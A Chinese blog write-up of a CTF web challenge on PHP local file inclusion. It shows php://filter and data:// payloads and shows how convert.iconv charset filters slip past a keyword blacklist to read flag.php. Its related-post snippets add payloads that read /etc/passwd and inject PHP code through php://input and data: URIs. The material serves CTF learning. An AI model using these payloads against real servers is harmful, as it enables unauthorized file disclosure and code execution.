WEB:题目名称-文件包含

已于 2023-07-20 23:31:11 修改
阅读量562 收藏
点赞数
分类专栏: 攻防世界 文章标签: 前端 web安全 网络安全
于 2023-07-19 15:06:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gsumall04/article/details/131807065
版权

背景知识

        

题目

题目了文件包含,所以想到了php伪协议

构造payload尝试读取flag.php

/?filename=php://filter/read=convert.base64-encode/resource=flag.php

 

 页面提示“do not hack”猜测可能是黑名单检测敏感字符串。猜测字符串哪些被禁用,这里输入单个字符串

构造payload

/?filename=base64

仍提示“do not hack”

构造payload

/?filename=convert

没有提示 "do not hack!",可以推测 "base64" 字符串在黑名单里。经过调试,"base64"、"string"、"read" 等都在黑名单里。 

在这里测试一下能不能用data://(涉及php.in的allow_url_include配置)

构造payload

/?filename=data://text/plain,1234567

 如果成功则会返回1234567,但是页面无,所以知道没有开启 allow_url_include

现在考虑 php://filter 有没有其他过滤器可以用

convert.iconv 相当于用了 iconv() 函数,这个函数是转换数据的字符集,比如 iconv("ASCII", "UTF-8", $string),也就是说只转换数据的表现形式,拿到数据之后,再把它的字符集转回来就行了。

利用姿势,把flag.php的内容从UCS-2LE.UCS编码转换为UCS-2BE编码

构造payload

/?filename=php://filter?convert.iconv.UCS-2LE.UCS-2BE/resource=flag.php

还是不行, 但是还有很多字符集可以尝试

UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*

用 bp爆破,暴力破解 intruder 模块有个“cluster bomb” (集束炸弹)模式,可以把上面所有的 16 个字符集格式做一个笛卡尔积,生成 256(16 *16)个请求。

设置位置 1 和位置 2 使用的字典,都是同一个

爆破完成后可发现flag

或者

设置payload

/?filename=php://filter/convert.iconv.UTF-7.UCS-4*/resource=flag.php

 参考文章链接:

攻防世界 - (题目名称-文件包含)_封于修x的博客-CSDN博客

php://filter_php://filter/_木…的博客-CSDN博客

sleepywin
关注
专栏目录
HCIE-Cloud Computing LAB备考第二步:逐题攻破--第五题:规划--题目分析
stqer的博客
03-16 729
目的:通过对思维导图,流程图,实验手册,视频讲解,考友导读等,与考试题目相关联,进行解读,使得考试时,看到题目,就能得出题目解读和雷点。
网络安全 | CTF】攻防世界 文件包含(泰山杯)解题详析
等风来
07-31 5173
而check.php的名称与代码相匹配,故猜测flag字段在flag.php中。显然关键字被过滤,因此转换过滤器,详情参考上面的链接。说明我们使用了正确的过滤器,但用法错误。分别为Payload集1和2添加字典。回显内容为逻辑过滤代码。
文件漏洞题目搜集
Devil_B的博客
05-14 677
百度杯”CTF比赛 2017 二月场 没错!就是文件包含漏洞。 <?php show_source(__FILE__); if(isset($_REQUEST['path'])){ include($_REQUEST['path']); }else{ include('phpinfo.php'); } 题目内容: 没错!就是文件包含漏洞。 解题知识点: 文件包含:服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时
攻防世界 - (题目名称-文件包含)
shawdow_bug的博客
09-18 4553
writeup
【攻防世界】题目名称-文件包含
最新发布
wangzhemvp的博客
04-09 767
一直显示 do not hack!,可能是 include("./check.php") 过滤了。依次尝试如下payload,还是提示 do not hack。看到 include(),想到文件包含,用php伪协议。convert.iconv. 要一个一个的破解。(1)php://filter 其他编码方式。convert.iconv.[ ]过滤器。,想到文件包含,用php伪协议。找到输出编码,再找输入编码。
攻防世界(题目名称-文件包含
……
09-14 1252
php协议过滤器绕过
文件包含练习1
qq_61109509的博客
02-07 1063
大佬文章
comp1006-PHP-Lab-01:comp1006-PHP-Lab01
02-08
【压缩包子文件的文件名称】"comp1006-PHP-Lab-01-main" 可能是实验室的主文件或者包含所有作业源码的目录。在解压后,这个文件可能包括一系列的PHP脚本文件(.php)、测试文件(.test)、示例数据(.txt或.csv)...
CTF---Web---文件包含---03---require_once
qq_22160557的博客
07-28 1852
文章目录前言一、题目描述二、解题步骤1、御剑扫描2、审计源代码3、构造payload4、查表名5、查列名6、查字段名总结 前言 题目分类: CTF—Web文件包含—03—require_once 一、题目描述 题目: b-11-未写完的网站 二、解题步骤 1、御剑扫描 Step1:用御剑扫描后,得到web.zip,为网站源代码。 2、审计源代码 Step2:题目逻辑: info.php页面中的role变量未经过addslashes过滤,经过将传入的$tem参数赋值为…/edit_info时,re
文件包含题型
我了解豹女就像农民伯伯了解大米
06-27 262
可以看到有file关键词可以进行php伪协议: 使用file伪协议查看/etc/passwd ?file=file:///etc/passwd http://192.168.129.128:83/vulnerabilities/fu1.php?file=file:///etc/passwd 使用php://input伪协议去查看ls / ?file=php:input (Post Data) <?php phpinfo()?> http://192.168.129.1..
文件包含漏洞三道题
qz362228的博客
05-04 1634
1.绕过require_once限制 题目页面: 有两个require_once,则this_is_flag.php已经被包含一次就不会再包含了。而题目意思就是说flag在this_is_flag.php文件中。所以要想绕过前面那个require_once,而执行后面那个。在浏览器中搜索绕过require_once限制 因为知道文件路径,所以最后是/www/html/file_include/Assess01/this_is_flag.php ?url=/proc/self/root/proc/self/r
南邮平台 文件包含漏洞题
qq_41497476的博客
05-24 428
当无法判断allow_url_fopen,allow_url_include的开启状态时,可逐一尝试如下的请求判断哪些能够执行 1.?file=data:text/plain,<?php phpinfo()?> 2.?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4= 3.?file=php://input...
WEB_文件包含
weixin_65204980的博客
11-27 44
system("ls")
java代码审计文件包含_代码审计--一道简单的文件包含题目的多种利用方式
weixin_28689507的博客
03-02 585
不知出自哪次CTF前言:本萌新最近在学习代码审计,有一天在水群聊到代码审计如何学习,然后某dalao丢给我一道题,说你对这题有什么看法,本萌新一看,这不是很简单吗,想也没多想就直接上去?file=flag.php,然后被dalao指教了一番,于是就有了这篇文章。目录:NO.1 传统方法首先来看下代码error_reporting(0);if(@isset($_GET["file"])){inclu...
以题为例浅谈文件包含(1),聪明人已经收藏了
m0_60607536的博客
04-09 561
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
XCTF相关题解Confusion1,easyphp文件包含,lottery,ics-05,easytornado(框架)
qq_62097048的博客
11-20 916
做的相关题目,也查阅了相关的wp,希望对新手有帮助
CTF---Web---文件包含---05---base64+路径
qq_22160557的博客
07-28 1064
文章目录前言一、题目描述二、解题步骤1、御剑扫描2、查看源码3、判断后缀4、路径构造5、base64解码三、总结 前言 题目分类: CTF—Web文件包含—05—base64+路径 一、题目描述 题目: 172.16.15.186/stage/8/ 文件包含 二、解题步骤 1、御剑扫描 Step1:御剑扫描,得到robots.txt文件,既而得到ge_t_key.php 2、查看源码 直接去访问172.16.15.186/stage/8/ge_t_key.php,发现内容为空,因为源码中没有echo
CTF_Web文件包含与php伪协议
AFCC_的博客(Web_Dog)
08-11 2988
前言 在CTF题目文件包含和伪协议使用也是常见的一类题目,常见的主要使用include()、require()等函数与其搭配产生可利用的漏洞或命令执行。 0x01 什么是文件包含 在开发的过程中,开发人员为了更好地使用代码的重用性,不重复的去编写一部分函数,从而引入了文件包含函数,通过文件包含函数将文件包含进来,使用包含文件的代码,降低开发的代码工作量,在同一个文件里面可以包含另外一个或多个文件进而使用他们内部定义的函数。 0x02 文件包含漏洞 在文件包含的过程中,如果没有对可包含的文件类型、用户可控的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值